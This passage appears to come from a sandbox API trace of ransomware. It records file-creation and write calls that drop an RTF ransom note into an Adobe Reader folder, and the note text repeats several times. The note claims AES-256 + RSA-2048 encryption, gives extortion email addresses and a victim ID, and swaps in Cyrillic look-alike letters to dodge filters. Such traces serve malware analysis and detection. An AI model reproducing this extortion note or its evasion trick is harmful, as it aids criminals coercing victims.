n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x2867358, cbMultiByte=7247, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 7247 [0065.477] WriteFile (in: hFile=0x1dc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1c4f, lpNumberOfBytesWritten=0x395fdbc, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x395fdbc*=0x1c4f, lpOverlapped=0x0) returned 1 [0065.478] CloseHandle (hObject=0x1dc) returned 1 [0065.478] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\dan\\bg85_info.rtf")) returned 0xffffffff [0065.478] GetLastError () returned 0x2 [0065.479] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Annotations\\Stamps\\DAN\\BG85_INFO.rtf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\annotations\\stamps\\dan\\bg85_info.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0065.479] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0065.479] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl 